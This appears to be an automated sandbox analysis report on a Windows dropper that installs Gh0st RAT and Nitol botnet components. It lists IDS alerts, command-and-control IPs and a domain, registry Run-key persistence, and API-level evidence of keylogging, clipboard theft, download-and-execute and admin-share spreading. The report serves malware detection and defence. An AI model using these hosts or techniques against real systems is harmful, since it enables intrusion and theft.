              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\XXXXXX05CA35CC\svchsot.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\Temp\server.exe, ProcessId: 7708, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\XXXXXX05CA35CC

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-23T09:13:17.322358+010020169221Malware Command and Control Activity Detected192.168.2.949717120.48.34.2338000TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-23T09:13:17.322358+010020132141Malware Command and Control Activity Detected192.168.2.949717120.48.34.2338000TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-23T09:13:18.814318+010020484781A Network Trojan was detected120.48.34.2338000192.168.2.949717TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-23T09:13:18.363697+010020251351Malware Command and Control Activity Detected192.168.2.949723120.48.34.2338080TCP
              2024-12-23T09:13:37.071523+010020251351Malware Command and Control Activity Detected192.168.2.94976193.46.8.908090TCP
              2024-12-23T09:13:41.286544+010020251351Malware Command and Control Activity Detected192.168.2.949770120.48.34.2338080TCP
              2024-12-23T09:14:03.725639+010020251351Malware Command and Control Activity Detected192.168.2.949816120.48.34.2338080TCP
              2024-12-23T09:14:19.283148+010020251351Malware Command and Control Activity Detected192.168.2.94984193.46.8.908090TCP
              2024-12-23T09:14:26.436544+010020251351Malware Command and Control Activity Detected192.168.2.949863120.48.34.2338080TCP
              2024-12-23T09:14:48.925491+010020251351Malware Command and Control Activity Detected192.168.2.949902120.48.34.2338080TCP
              2024-12-23T09:15:01.201380+010020251351Malware Command and Control Activity Detected192.168.2.94992893.46.8.908090TCP
              2024-12-23T09:15:19.384989+010020251351Malware Command and Control Activity Detected192.168.2.949944120.48.34.2338080TCP
              2024-12-23T09:15:34.537181+010020251351Malware Command and Control Activity Detected192.168.2.949985120.48.34.2338080TCP
              2024-12-23T09:15:41.766783+010020251351Malware Command and Control Activity Detected192.168.2.94998693.46.8.908090TCP
              2024-12-23T09:15:56.678352+010020251351Malware Command and Control Activity Detected192.168.2.949987120.48.34.2338080TCP
              2024-12-23T09:16:19.335820+010020251351Malware Command and Control Activity Detected192.168.2.949988120.48.34.2338080TCP
              2024-12-23T09:16:36.233553+010020251351Malware Command and Control Activity Detected192.168.2.94998946.82.174.698090TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-23T09:13:18.814318+010028088141Malware Command and Control Activity Detected120.48.34.2338000192.168.2.949717TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-23T09:13:10.187285+010028075501Malware Command and Control Activity Detected192.168.2.949902120.48.34.2338080TCP
              2024-12-23T09:13:10.187285+010028075501Malware Command and Control Activity Detected192.168.2.94984193.46.8.908090TCP
              2024-12-23T09:13:10.187285+010028075501Malware Command and Control Activity Detected192.168.2.949863120.48.34.2338080TCP
              2024-12-23T09:13:10.187285+010028075501Malware Command and Control Activity Detected192.168.2.94998946.82.174.698090TCP
              2024-12-23T09:13:10.187285+010028075501Malware Command and Control Activity Detected192.168.2.94998693.46.8.908090TCP
              2024-12-23T09:13:10.187285+010028075501Malware Command and Control Activity Detected192.168.2.949985120.48.34.2338080TCP
              2024-12-23T09:13:10.187285+010028075501Malware Command and Control Activity Detected192.168.2.949988120.48.34.2338080TCP
              2024-12-23T09:13:10.187285+010028075501Malware Command and Control Activity Detected192.168.2.94992893.46.8.908090TCP
              2024-12-23T09:13:10.187285+010028075501Malware Command and Control Activity Detected192.168.2.949987120.48.34.2338080TCP
              2024-12-23T09:13:10.187285+010028075501Malware Command and Control Activity Detected192.168.2.949723120.48.34.2338080TCP
              2024-12-23T09:13:10.187285+010028075501Malware Command and Control Activity Detected192.168.2.949770120.48.34.2338080TCP
              2024-12-23T09:13:10.187285+010028075501Malware Command and Control Activity Detected192.168.2.94976193.46.8.908090TCP
              2024-12-23T09:13:10.187285+010028075501Malware Command and Control Activity Detected192.168.2.949944120.48.34.2338080TCP
              2024-12-23T09:13:10.187285+010028075501Malware Command and Control Activity Detected192.168.2.949816120.48.34.2338080TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: G3izWAY3Fa.exeAvira: detected
              Antivirus detection for dropped file
              Source: C:\Windows\XXXXXX05CA35CC\svchsot.exeAvira: detection malicious, Label: BDS/Zegost.birna
              Source: C:\Windows\Temp\server.exeAvira: detection malicious, Label: BDS/Zegost.birna
              Source: C:\Windows\Temp\v5.exeAvira: detection malicious, Label: TR/Staser.apzjs
              Multi AV Scanner detection for dropped file
              Source: C:\Windows\Temp\server.exeReversingLabs: Detection: 95%
              Source: C:\Windows\Temp\v5.exeReversingLabs: Detection: 100%
              Source: C:\Windows\XXXXXX05CA35CC\svchsot.exeReversingLabs: Detection: 95%
              Multi AV Scanner detection for submitted file
              Source: G3izWAY3Fa.exeReversingLabs: Detection: 86%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.8% probability
              Machine Learning detection for dropped file
              Source: C:\Windows\XXXXXX05CA35CC\svchsot.exeJoe Sandbox ML: detected
              Source: C:\Windows\Temp\server.exeJoe Sandbox ML: detected
              Source: C:\Windows\Temp\v5.exeJoe Sandbox ML: detected
              Source: G3izWAY3Fa.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbg source: .exe, 00000005.00000002.3268806421.0000000003EE4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb$ source: .exe, 00000005.00000002.3268499543.0000000002240000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: f:\SystemTool Eng 19\SystemTool Eng 16\SystemTool Eng 52\SystemTool\Release\SystemTool.pdb source: G3izWAY3Fa.exe, 00000000.00000002.1384775691.000000000307F000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000005.00000000.1380991211.0000000000465000.00000002.00000001.01000000.00000007.sdmp, .exe, 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp, .exe.0.dr
              Source: Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: .exe, 00000005.00000002.3268499543.0000000002240000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdb source: .exe, 00000005.00000002.3268703284.000000000282E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mp\\Symbols\winload_prod.pdb source: .exe, 00000005.00000002.3268499543.0000000002240000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: -00c04fd929dbmp\\Symbols\winload_prod.pdbrord32_super_sbx\Adobe\Acrob source: .exe, 00000005.00000002.3268499543.0000000002240000.00000004.00000020.00020000.00000000.sdmp

              Spreading

              barindex
              Contains functionality to enumerate network shares of other devices
              Source: C:\Windows\Temp\v5.exeCode function: 4_2_00402AD0 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,memset,lstrcmp,sprintf,sprintf,sprintf,WNetAddConnection2A,Sleep,memset,sprintf,CopyFileA,memset,sprintf,memset,sprintf,memset,sprintf,memset,sprintf,GetLocalTime,memset,sprintf,WinExec,Sleep, \\%s\admin$\g1fd.exe4_2_00402AD0
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeCode function: 0_2_00405302 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00405302
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeCode function: 0_2_0040263E FindFirstFileA,0_2_0040263E
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeCode function: 0_2_00405CD8 FindFirstFileA,FindClose,0_2_00405CD8
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10001A20 GetSystemDirectoryA,wsprintfA,wsprintfA,CreateFileA,CloseHandle,Sleep,Sleep,FindFirstFileA,GetCurrentDirectoryA,strstr,Sleep,GetVersionExA,GetSystemDefaultLCID,Sleep,Sleep,GetLocalTime,wsprintfA,_mkdir,Sleep,GetModuleFileNameA,CopyFileA,wsprintfA,wsprintfA,BeginUpdateResourceA,UpdateResourceA,EndUpdateResourceA,CloseHandle,Sleep,ShellExecuteA,Sleep,GetWindowsDirectoryA,wsprintfA,wsprintfA,_mkdir,_mkdir,_mkdir,_mkdir,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,3_2_10001A20
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100014B0 GetSystemDirectoryA,FindFirstFileA,CreateFileA,ReadFile,wsprintfA,wsprintfA,CloseHandle,wsprintfA,lstrlen,lstrlen,wsprintfA,lstrlen,3_2_100014B0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10008B50 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,??2@YAPAXI@Z,??3@YAXPAX@Z,wsprintfA,FindNextFileA,FindClose,3_2_10008B50
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10008520 LocalAlloc,wsprintfA,FindFirstFileA,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose,3_2_10008520
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10008E40 FindFirstFileA,FindClose,FindClose,3_2_10008E40
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100086F0 wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,3_2_100086F0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10008F00 FindFirstFileA,FindClose,CreateFileA,CloseHandle,3_2_10008F00
              Source: C:\Windows\Temp\ .exeCode function: 5_2_0045B051 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,5_2_0045B051
              Source: C:\Windows\Temp\ .exeCode function: 5_2_00405260 FindFirstFileA,GetFileAttributesA,SetFileAttributesA,RemoveDirectoryA,DeleteFileA,FindNextFileA,FindClose,5_2_00405260
              Source: C:\Windows\Temp\ .exeCode function: 5_2_00439D40 #17,__time32,FindFirstFileA,DeleteFileA,5_2_00439D40
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1000AA30 wsprintfA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,wsprintfA,GetTickCount,wsprintfA,GetComputerNameA,GetUserNameA,wsprintfA,GetLogicalDriveStringsA,lstrlen,GetVolumeInformationA,SHGetFileInfo,lstrlen,lstrlen,GetDiskFreeSpaceExA,lstrlen,wsprintfA,wsprintfA,GlobalMemoryStatusEx,GlobalMemoryStatusEx,wsprintfA,GlobalMemoryStatusEx,wsprintfA,wsprintfA,lstrlen,wsprintfA,_strrev,_strrev,_strrev,_strrev,wsprintfA,wsprintfA,3_2_1000AA30
              Source: C:\Windows\Temp\ .exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
              Source: C:\Windows\Temp\ .exeFile opened: C:\Users\user\AppData\LocalJump to behavior
              Source: C:\Windows\Temp\ .exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\History\desktop.iniJump to behavior
              Source: C:\Windows\Temp\ .exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Windows\Temp\ .exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
              Source: C:\Windows\Temp\ .exeFile opened: C:\Users\userJump to behavior

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2013214 - Severity 1 - ET MALWARE Gh0st Remote Access Trojan Encrypted Session To CnC Server : 192.168.2.9:49717 -> 120.48.34.233:8000
              Source: Network trafficSuricata IDS: 2016922 - Severity 1 - ET MALWARE Backdoor family PCRat/Gh0st CnC traffic : 192.168.2.9:49717 -> 120.48.34.233:8000
              Source: Network trafficSuricata IDS: 2048478 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Gh0stRat Keep-Alive : 120.48.34.233:8000 -> 192.168.2.9:49717
              Source: Network trafficSuricata IDS: 2808814 - Severity 1 - ETPRO MALWARE Backdoor family PCRat/Gh0st CnC Response : 120.48.34.233:8000 -> 192.168.2.9:49717
              Source: Network trafficSuricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49723 -> 120.48.34.233:8080
              Source: Network trafficSuricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49761 -> 93.46.8.90:8090
              Source: Network trafficSuricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49770 -> 120.48.34.233:8080
              Source: Network trafficSuricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49816 -> 120.48.34.233:8080
              Source: Network trafficSuricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49841 -> 93.46.8.90:8090
              Source: Network trafficSuricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49863 -> 120.48.34.233:8080
              Source: Network trafficSuricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49902 -> 120.48.34.233:8080
              Source: Network trafficSuricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49928 -> 93.46.8.90:8090
              Source: Network trafficSuricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49988 -> 120.48.34.233:8080
              Source: Network trafficSuricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49987 -> 120.48.34.233:8080
              Source: Network trafficSuricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49986 -> 93.46.8.90:8090
              Source: Network trafficSuricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49985 -> 120.48.34.233:8080
              Source: Network trafficSuricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49944 -> 120.48.34.233:8080
              Source: Network trafficSuricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49989 -> 46.82.174.69:8090
              Source: Network trafficSuricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49902 -> 120.48.34.233:8080
              Source: Network trafficSuricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49841 -> 93.46.8.90:8090
              Source: Network trafficSuricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49863 -> 120.48.34.233:8080
              Source: Network trafficSuricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49989 -> 46.82.174.69:8090
              Source: Network trafficSuricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49986 -> 93.46.8.90:8090
              Source: Network trafficSuricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49985 -> 120.48.34.233:8080
              Source: Network trafficSuricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49988 -> 120.48.34.233:8080
              Source: Network trafficSuricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49928 -> 93.46.8.90:8090
              Source: Network trafficSuricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49987 -> 120.48.34.233:8080
              Source: Network trafficSuricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49723 -> 120.48.34.233:8080
              Source: Network trafficSuricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49770 -> 120.48.34.233:8080
              Source: Network trafficSuricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49761 -> 93.46.8.90:8090
              Source: Network trafficSuricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49944 -> 120.48.34.233:8080
              Source: Network trafficSuricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49816 -> 120.48.34.233:8080
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1000B6F0 Sleep,wsprintfA,GetTickCount,GetTickCount,wsprintfA,URLDownloadToFileA,GetTempPathA,fopen,fscanf,fscanf,GetTickCount,wsprintfA,GetTickCount,wsprintfA,URLDownloadToFileA,ShellExecuteA,fscanf,fclose,DeleteFileA,Sleep,3_2_1000B6F0
              Source: global trafficTCP traffic: 192.168.2.9:49717 -> 120.48.34.233:8000
              Source: global trafficTCP traffic: 192.168.2.9:49761 -> 93.46.8.90:8090
              Source: Joe Sandbox ViewASN Name: CHINANET-BACKBONENo31Jin-rongStreetCN CHINANET-BACKBONENo31Jin-rongStreetCN
              Source: Joe Sandbox ViewASN Name: FASTWEBIT FASTWEBIT
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Windows\Temp\v5.exeCode function: 2_2_004036C6 select,__WSAFDIsSet,recv,2_2_004036C6
              Source: global trafficDNS traffic detected: DNS query: chinagov.8800.org
              Source: v5.exe, 00000004.00000002.3331561423.0000000000768000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1
              Source: v5.exe, 00000004.00000002.3331561423.0000000000768000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1/
              Source: v5.exe, 00000004.00000002.3331561423.0000000000768000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1/&
              Source: G3izWAY3Fa.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
              Source: G3izWAY3Fa.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: .exe, 00000005.00000002.3268535550.000000000224B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
              Source: .exe, 00000005.00000002.3255175197.000000000089B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: .exe, 00000005.00000002.3255175197.0000000000844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033l
              Source: .exe, 00000005.00000002.3255175197.0000000000844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033taiLMEM
              Source: .exe, 00000005.00000002.3268806421.0000000003EE4000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000005.00000002.3255175197.000000000089B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: .exe, 00000005.00000002.3255175197.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=6c2de995c290b031854b

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Contains functionality to capture and log keystrokes
              Source: C:\Windows\Temp\server.exeCode function: <BackSpace>3_2_10009A00
              Source: C:\Windows\Temp\server.exeCode function: <Enter>3_2_10009A00
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeCode function: 0_2_00404EB9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404EB9
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1000FA20 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,3_2_1000FA20
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1000FA90 OpenClipboard,GetClipboardData,CloseClipboard,GlobalSize,GlobalLock,??2@YAPAXI@Z,GlobalUnlock,CloseClipboard,??3@YAXPAX@Z,3_2_1000FA90
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10009A00 GetKeyState,Sleep,lstrlen,GetKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,lstrcat,lstrlen,lstrcat,lstrcat,3_2_10009A00
              Source: C:\Windows\Temp\ .exeCode function: 5_2_00457B94 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,5_2_00457B94

              E-Banking Fraud

              barindex
              Checks if browser processes are running
              Source: C:\Windows\Temp\server.exeCode function: RegOpenKeyExA,RegQueryValueA,RegCloseKey,Sleep,lstrlen,strstr,lstrcpy,CreateProcessA, Applications\iexplore.exe\shell\open\command3_2_1000A6B0
              Source: conhost.exeProcess created: 51
              Source: cmd.exeProcess created: 96

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: dump.pcap, type: PCAPMatched rule: gh0st Author: https://github.com/jackcr/
              Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader Author: Florian Roth
              Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects a ZxShell related sample from a CN threat group Author: Florian Roth
              Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
              Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Nitol Malware Author: Florian Roth
              Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader Author: Florian Roth
              Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects a ZxShell related sample from a CN threat group Author: Florian Roth
              Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
              Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Nitol Malware Author: Florian Roth
              Source: 00000003.00000002.3339534621.0000000001FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: gh0st Author: https://github.com/jackcr/
              Source: 00000003.00000002.3363429748.0000000002A7D000.00000004.00000010.00020000.00000000.sdmp, type: MEMORYMatched rule: gh0st Author: https://github.com/jackcr/
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10002800 NtdllDefWindowProc_A,3_2_10002800
              Source: C:\Windows\Temp\ .exeCode function: 5_2_0042E150: DeviceIoControl,5_2_0042E150
              Source: C:\Windows\Temp\v5.exeCode function: 2_2_0040351A OpenSCManagerA,OpenServiceA,CloseServiceHandle,DeleteService,CloseServiceHandle,CloseServiceHandle,2_2_0040351A
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeCode function: 0_2_004030CB EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_004030CB
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10012010 ExitWindowsEx,3_2_10012010
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1000B0F0 _strrev,_strrev,_strrev,GetVersionExA,ExitWindowsEx,3_2_1000B0F0
              Source: C:\Windows\Temp\ .exeCode function: 5_2_0043A500 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,5_2_0043A500
              Source: C:\Windows\Temp\ .exeCode function: 5_2_0043AD30 MessageBoxA,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,5_2_0043AD30
